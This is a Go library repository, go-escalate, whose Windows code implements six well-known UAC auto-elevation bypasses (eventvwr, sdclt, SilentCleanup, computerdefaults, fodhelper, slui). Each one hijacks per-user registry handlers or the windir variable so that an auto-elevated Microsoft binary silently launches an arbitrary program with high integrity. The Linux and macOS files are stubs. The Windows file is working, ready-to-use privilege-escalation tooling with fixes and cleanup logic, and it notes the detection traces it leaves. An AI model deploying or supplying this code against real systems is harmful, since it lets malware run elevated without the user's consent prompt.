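├── README.md
├── go.mod
├── go.sum
├── .gitignore
├── escalate_linux.go
├── escalate_darwin.go
├── LICENSE
├── util_windows.go
└── escalate_windows.go

/README.md:
--------------------------------------------------------------------------------
# go-escalate

The goal is to provide an easy to use API to escalate privileges on Linux, Windows and macOS.

Currently only the Windows build does anything: `Escalate` tries a series of
well-known UAC auto-elevation bypasses in turn (see `escalate_windows.go`).
They presuppose that the current user is already an administrator; UAC only
decides whether a prompt is shown. The Linux and macOS builds are stubs that
return an error.
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
module github.com/lu4p/go-escalate

go 1.14

require golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 h1:5B6i6EAiSYyejWfvc5Rc9BbI3rzIsrrXfAQBWnYfn+w=
golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Binaries for programs and plugins
*.exe
*.exe~
*.dll
*.so
*.dylib

# Test binary, build with `go test -c`
*.test

# Output of the go coverage tool, specifically when used with LiteIDE
*.out
--------------------------------------------------------------------------------
/escalate_linux.go:
--------------------------------------------------------------------------------
// Package escalate provides a single entry point, Escalate, that tries to run
// a given program with elevated privileges. Only the Windows build has an
// implementation; this Linux build is a stub.
package escalate

import (
	"errors"
	"log"
)

// ErrNotImplemented is returned by Escalate on platforms that have no
// privilege-escalation implementation yet, so callers can tell "unsupported
// here" apart from a failed attempt.
var ErrNotImplemented = errors.New("escalate: not implemented on this platform")

// Escalate is the Linux stub of the escalation entry point.
//
// path is the program the elevated context would run; it is only logged.
// Escalate always returns ErrNotImplemented (the error string is now lowercase
// and wrapped in a sentinel, as Go convention expects).
func Escalate(path string) error {
	log.Println("Path for bypass: (", path, ")")
	return ErrNotImplemented
}
--------------------------------------------------------------------------------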
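/escalate_darwin.go:
--------------------------------------------------------------------------------
// Package escalate provides a single entry point, Escalate, that tries to run
// a given program with elevated privileges. Only the Windows build has an
// implementation; this macOS build is a stub.
package escalate

import (
	"errors"
	"log"
)

// ErrNotImplemented is returned by Escalate on platforms that have no
// privilege-escalation implementation yet, so callers can tell "unsupported
// here" apart from a failed attempt.
var ErrNotImplemented = errors.New("escalate: not implemented on this platform")

// Escalate is the macOS stub of the escalation entry point.
//
// path is the program the elevated context would run; it is only logged.
// Escalate always returns ErrNotImplemented. The Linux and macOS stubs
// previously returned two differently-capitalised messages ("Not implemented
// yet" / "Not Implemented yet"); they now share one sentinel.
func Escalate(path string) error {
	log.Println("Path for bypass: (", path, ")")
	return ErrNotImplemented
}
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
This is free and unencumbered software released into the public domain.

Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.

In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.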
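
For more information, please refer to <https://unlicense.org>
--------------------------------------------------------------------------------
/util_windows.go:
--------------------------------------------------------------------------------
package escalate

import (
	"bytes"
	"errors"
	"fmt"
	"os"
	"os/exec"
	"strconv"
	"strings"
)

// GetVer returns the major version of the running Windows installation as
// printed by the `ver` shell built-in (6 for Windows 7/8/8.1, 10 for Windows
// 10; Windows 11 also reports itself as 10.0 to `ver`).
//
// It shells out to cmd.exe rather than querying the OS directly, so it is
// subject to the usual caveats of parsing command output. The banner is
// localized ("version"/"Versión"/...), which is why only the bracketed numeric
// part is parsed. The original ran `cmd ver` without /C and relied on the
// interactive banner; `cmd /C ver` is what actually runs the built-in.
func GetVer() (int, error) {
	cmd := exec.Command("cmd", "/C", "ver")
	var stdout, stderr bytes.Buffer
	cmd.Stdout = &stdout
	cmd.Stderr = &stderr
	if err := cmd.Run(); err != nil {
		return 0, fmt.Errorf("running ver: %w (%s)", err, strings.TrimSpace(stderr.String()))
	}
	return parseMajorVersion(stdout.String())
}

// parseMajorVersion extracts the major version from a `ver` banner such as
// "Microsoft Windows [Version 10.0.19041.1]". Only the first run of ASCII
// digits inside the first pair of square brackets is used, so neither the
// localized word before the number nor line endings matter.
//
// Returns an error when there are no brackets or no digits inside them; the
// original sliced at a fixed offset and could panic on a short banner.
func parseMajorVersion(banner string) (int, error) {
	open := strings.IndexByte(banner, '[')
	if open == -1 {
		return 0, errors.New("version string has wrong format")
	}
	closeIdx := strings.IndexByte(banner[open:], ']')
	if closeIdx == -1 {
		return 0, errors.New("version string has wrong format")
	}
	inner := banner[open+1 : open+closeIdx]

	start := strings.IndexFunc(inner, isASCIIDigit)
	if start == -1 {
		return 0, errors.New("version string has wrong format")
	}
	end := start
	for end < len(inner) && isASCIIDigit(rune(inner[end])) {
		end++
	}
	major, err := strconv.Atoi(inner[start:end])
	if err != nil {
		return 0, fmt.Errorf("version could not be converted to int: %w", err)
	}
	return major, nil
}

// isASCIIDigit reports whether r is one of '0'..'9'.
func isASCIIDigit(r rune) bool { return r >= '0' && r <= '9' }

// CheckElevate reports whether the current process can open the raw disk
// device \\.\PHYSICALDRIVE0, which normally requires administrative rights.
//
// This is a heuristic, not a token check: it returns false on a machine with
// no PHYSICALDRIVE0 (some VMs, diskless setups) even when elevated, and it
// says nothing about the integrity level of the process. The handle is now
// closed right away; the original leaked one open device handle per call.
func CheckElevate() bool {
	f, err := os.Open(`\\.\PHYSICALDRIVE0`)
	if err != nil {
		return false
	}
	// Best effort: we only needed to know that the open succeeded.
	f.Close()
	return true
}
--------------------------------------------------------------------------------
/escalate_windows.go:
--------------------------------------------------------------------------------
// Package escalate provides a single entry point, Escalate, that tries to run
// a given program with elevated privileges. On Windows this is done with
// User Account Control auto-elevation bypasses; the Linux and macOS builds
// are stubs.
package escalate

import (
	"errors"
	"fmt"
	"log"
	"os/exec"
	"strings"
	"syscall"
	"time"

	"golang.org/x/sys/windows/registry"
)

const (
	// settleDelay is the pause between planting a registry override and
	// starting the binary that reads it (kept from the original sequence,
	// presumably to let the write land before the launcher looks it up).
	settleDelay = 2 * time.Second
	// elevateWait is how long an override stays in place after the launch so
	// the auto-elevated process has time to consult it before cleanup.
	elevateWait = 5 * time.Second
)

// Escalate tries, in order, a set of well-known UAC auto-elevation bypasses
// until one of them launches path in an elevated context. Each technique
// plants a per-user registry override that an auto-elevating Microsoft binary
// consults, starts that binary, waits elevateWait and removes the override.
//
// The technique set is chosen from the major version reported by GetVer:
// version 10 tries computerdefaults, sdcltcontrol and fodhelper first; any
// version above 9 then tries silentCleanUp and slui; anything below 10 gets
// eventvwr. Note that the "> 9" guard means silentCleanUp and slui are never
// attempted on Windows 8.1 (major version 6) even though their comments claim
// support there; that is the original behaviour and is left unchanged.
//
// Preconditions and caveats:
//   - The interactive user must already be a member of Administrators; these
//     bypasses skip the UAC prompt, they do not grant rights a standard user
//     does not have. The result is a high-integrity process, not "root".
//   - "Success" only means the registry write and the process launch did not
//     error; whether path actually ran elevated is not verified. Callers can
//     use CheckElevate from the payload as a crude test.
//   - path is written verbatim into the registry, so it must be a fully
//     qualified command line (quoted if it contains spaces).
//   - Every technique leaves forensic traces: writes under HKCU\Software\Classes
//     (ms-settings, mscfile, exefile), HKCU\...\App Paths\control.exe or
//     HKCU\Environment, plus an auto-elevated binary spawning path. These are
//     well-known detections for Sysmon/EDR registry and process telemetry.
//
// Returns nil when a technique reported success, the GetVer error when the
// version cannot be determined, and "uac bypass failed" otherwise.
func Escalate(path string) (err error) {
	log.Println("Path for bypass: (", path, ")")
	version, err := GetVer()
	if err != nil {
		return err
	}

	type technique struct {
		name string
		run  func(string) error
	}
	var attempts []technique
	if version == 10 {
		attempts = append(attempts,
			technique{"computerdefaults", computerdefaults},
			technique{"sdcltcontrol", sdcltcontrol},
			technique{"fodhelper", fodhelper},
		)
	}
	if version > 9 {
		attempts = append(attempts,
			technique{"silentCleanUp", silentCleanUp},
			technique{"slui", slui},
		)
	}
	if version < 10 {
		attempts = append(attempts, technique{"eventvwr", eventvwr})
	}

	for _, t := range attempts {
		if err = t.run(path); err == nil {
			log.Println(t.name)
			return nil
		}
		log.Printf("%s failed: %v", t.name, err)
	}
	return errors.New("uac bypass failed")
}

// setHandler writes the per-user override that an auto-elevating binary will
// consult: the default value of keyPath becomes the command line to run and,
// when delegate is true, an empty DelegateExecute value is added as well
// (the ms-settings and exefile techniques rely on that value being present).
//
// HKCU\Software\Classes is consulted before HKLM when the shell resolves a
// handler, which is what makes a per-user override effective. The original
// fodhelper variant misspelled the value as "DelegeteExecute"; all callers
// now share this one spelling.
func setHandler(keyPath, path string, delegate bool) error {
	key, _, err := registry.CreateKey(registry.CURRENT_USER, keyPath, registry.SET_VALUE)
	if err != nil {
		return fmt.Errorf("creating HKCU\\%s: %w", keyPath, err)
	}
	defer key.Close()

	if err := key.SetStringValue("", path); err != nil {
		return fmt.Errorf("setting default value of HKCU\\%s: %w", keyPath, err)
	}
	if delegate {
		if err := key.SetStringValue("DelegateExecute", ""); err != nil {
			return fmt.Errorf("setting DelegateExecute on HKCU\\%s: %w", keyPath, err)
		}
	}
	return nil
}

// deleteKeyTree removes HKCU\keyPath and everything below it. A missing key
// is not an error.
//
// registry.DeleteKey (RegDeleteKey) refuses to delete a key that still has
// subkeys, so the original one-shot DeleteKey calls on e.g.
// Software\Classes\mscfile or Software\Classes\exefile silently failed and
// left the hijacked handler in place for the user; this walks and deletes the
// subkeys first.
func deleteKeyTree(keyPath string) error {
	k, err := registry.OpenKey(registry.CURRENT_USER, keyPath, registry.ENUMERATE_SUB_KEYS)
	if err != nil {
		if err == registry.ErrNotExist {
			return nil
		}
		return fmt.Errorf("opening HKCU\\%s: %w", keyPath, err)
	}
	subs, err := k.ReadSubKeyNames(-1)
	k.Close() // the key must be closed before it can be deleted
	if err != nil {
		return fmt.Errorf("listing subkeys of HKCU\\%s: %w", keyPath, err)
	}
	for _, sub := range subs {
		if err := deleteKeyTree(keyPath + `\` + sub); err != nil {
			return err
		}
	}
	if err := registry.DeleteKey(registry.CURRENT_USER, keyPath); err != nil && err != registry.ErrNotExist {
		return fmt.Errorf("deleting HKCU\\%s: %w", keyPath, err)
	}
	return nil
}

// cleanupKey removes a hijack key tree and logs, rather than returns, any
// failure: a cleanup problem must never mask the result of the technique,
// but an override that is left behind has to be visible to the operator.
// It is meant to be deferred right after the override is planted so it runs
// even when the launch fails (the original skipped cleanup on that path).
func cleanupKey(keyPath string) {
	if err := deleteKeyTree(keyPath); err != nil {
		log.Printf("cleanup failed, override left behind: %v", err)
	}
}

// startHidden launches name through `cmd /C start "" name` with the console
// window hidden. start returns as soon as the target is launched, so this
// does not wait for the auto-elevated binary itself. The empty first argument
// is start's window-title slot; without it a quoted name would be taken as
// the title instead of the program.
func startHidden(name string) error {
	cmd := exec.Command("cmd", "/C", "start", "", name)
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	if out, err := cmd.CombinedOutput(); err != nil {
		return fmt.Errorf("starting %s: %w (%s)", name, err, strings.TrimSpace(string(out)))
	}
	return nil
}

// runAndWait executes name directly and blocks until it exits, which is how
// the original launched eventvwr.exe and slui.exe. Be aware that for a GUI
// binary this wait lasts until that window is closed.
func runAndWait(name string) error {
	if err := exec.Command(name).Run(); err != nil {
		return fmt.Errorf("running %s: %w", name, err)
	}
	return nil
}

// eventvwr overrides the per-user handler for .msc files and starts
// eventvwr.exe, which is auto-elevated and, per the technique reproduced
// here, resolves that handler through HKCU. Author's note: works on 7, 8
// and 8.1; fixed in Windows 10.
//
// Registry touched: HKCU\Software\Classes\mscfile\shell\open\command. The
// whole mscfile tree is removed afterwards, including any pre-existing
// per-user mscfile override the user may have had.
func eventvwr(path string) error {
	log.Println("eventvwr")
	if err := setHandler(`Software\Classes\mscfile\shell\open\command`, path, false); err != nil {
		return err
	}
	defer cleanupKey(`Software\Classes\mscfile`)

	time.Sleep(settleDelay)
	if err := runAndWait("eventvwr.exe"); err != nil {
		return err
	}
	time.Sleep(elevateWait)
	return nil
}

// sdcltcontrol plants a per-user App Paths entry for control.exe and starts
// sdclt.exe (auto-elevated), which launches control.exe and thereby picks up
// the override. Author's note: works on Windows 10.
//
// Registry touched: HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
func sdcltcontrol(path string) error {
	log.Println("sdcltcontrol")
	const keyPath = `Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe`
	if err := setHandler(keyPath, path, false); err != nil {
		return err
	}
	defer cleanupKey(keyPath)

	time.Sleep(settleDelay)
	if err := startHidden("sdclt.exe"); err != nil {
		return err
	}
	time.Sleep(elevateWait)
	return nil
}

// silentCleanUp sets a per-user windir environment variable to path and
// starts the scheduled task \Microsoft\Windows\DiskCleanup\SilentCleanup,
// which the author notes runs elevated even with UAC set to "Always notify"
// (on 8.1 and 10; patched on some builds).
//
// Caveats:
//   - The task's own command line is what expands %windir%, so path ends up
//     followed by the task's remaining arguments; a bare executable path is
//     unlikely to work unless it neutralises that suffix. Confirm against the
//     task definition on the target.
//   - A per-user windir pointing at the payload breaks every program that
//     expands %windir% and persists across logons, so the previous value is
//     saved and restored (or the value deleted if there was none) even when
//     the task cannot be started. The original assumed no prior value and
//     ignored the error of the cleanup open.
//   - A pre-existing REG_EXPAND_SZ value is restored as REG_SZ.
func silentCleanUp(path string) error {
	log.Println("silentCleanUp")

	env, _, err := registry.CreateKey(registry.CURRENT_USER, `Environment`, registry.SET_VALUE|registry.QUERY_VALUE)
	if err != nil {
		return fmt.Errorf("opening HKCU\\Environment: %w", err)
	}
	prev, _, getErr := env.GetStringValue("windir")
	hadPrev := getErr == nil
	err = env.SetStringValue("windir", path)
	env.Close()
	if err != nil {
		return fmt.Errorf("setting windir: %w", err)
	}
	defer restoreWindir(prev, hadPrev)

	time.Sleep(settleDelay)
	cmd := exec.Command("schtasks", "/Run", "/TN", `\Microsoft\Windows\DiskCleanup\SilentCleanup`, "/I")
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	if out, err := cmd.CombinedOutput(); err != nil {
		return fmt.Errorf("running SilentCleanup task: %w (%s)", err, strings.TrimSpace(string(out)))
	}
	return nil
}

// restoreWindir puts HKCU\Environment\windir back to prev when hadPrev is
// true and deletes it otherwise. Failures are logged, not returned, so the
// operator sees that the override persists.
func restoreWindir(prev string, hadPrev bool) {
	env, err := registry.OpenKey(registry.CURRENT_USER, `Environment`, registry.SET_VALUE)
	if err != nil {
		log.Printf("cleanup: opening HKCU\\Environment failed: %v (windir override left behind)", err)
		return
	}
	defer env.Close()
	if hadPrev {
		err = env.SetStringValue("windir", prev)
	} else if err = env.DeleteValue("windir"); err == registry.ErrNotExist {
		err = nil
	}
	if err != nil {
		log.Printf("cleanup: restoring windir failed: %v (override left behind)", err)
	}
}

// computerdefaults overrides the per-user ms-settings handler and starts
// computerdefaults.exe. Author's note: works on Windows 10 and is more
// reliable than fodhelper.
func computerdefaults(path string) error {
	log.Println("computerdefaults")
	return hijackMSSettings("computerdefaults.exe", path)
}

// fodhelper overrides the per-user ms-settings handler and starts
// fodhelper.exe. Author's note: works on Windows 10, computerdefaults is more
// reliable.
//
// The original could never succeed: it launched exec.Command("start fodhelper.exe"),
// i.e. looked for an executable literally named "start fodhelper.exe", and
// misspelled DelegateExecute. It now shares the computerdefaults code path.
func fodhelper(path string) error {
	log.Println("fodhelper")
	return hijackMSSettings("fodhelper.exe", path)
}

// hijackMSSettings is the common body of computerdefaults and fodhelper: both
// binaries are auto-elevated and resolve the ms-settings handler, so
// overriding it per-user and starting either of them runs path.
//
// Registry touched: HKCU\Software\Classes\ms-settings\shell\open\command
// (default value and DelegateExecute). The whole ms-settings tree is removed
// afterwards; the original's DeleteKey on the parent failed because the
// subkeys still existed.
func hijackMSSettings(exe, path string) error {
	if err := setHandler(`Software\Classes\ms-settings\shell\open\command`, path, true); err != nil {
		return err
	}
	defer cleanupKey(`Software\Classes\ms-settings`)

	time.Sleep(settleDelay)
	if err := startHidden(exe); err != nil {
		return err
	}
	time.Sleep(elevateWait)
	return nil
}

// slui overrides the per-user handler for .exe files and runs slui.exe.
// Author's note: works on 8.1 and 10 (but see Escalate: the version guard
// never reaches 8.1).
//
// This is the most intrusive technique: while
// HKCU\Software\Classes\exefile\shell\open\command points at path, every
// executable the user launches through the shell runs path instead. The
// original tried to delete `Software\Classes\exefile\` in one call, which
// fails while the subkeys exist, so the override was left behind permanently;
// the tree is now removed even when the launch fails.
func slui(path string) error {
	log.Println("slui")
	if err := setHandler(`Software\Classes\exefile\shell\open\command`, path, true); err != nil {
		return err
	}
	defer cleanupKey(`Software\Classes\exefile`)

	time.Sleep(settleDelay)
	if err := runAndWait("slui.exe"); err != nil {
		return err
	}
	time.Sleep(elevateWait)
	return nil
}
--------------------------------------------------------------------------------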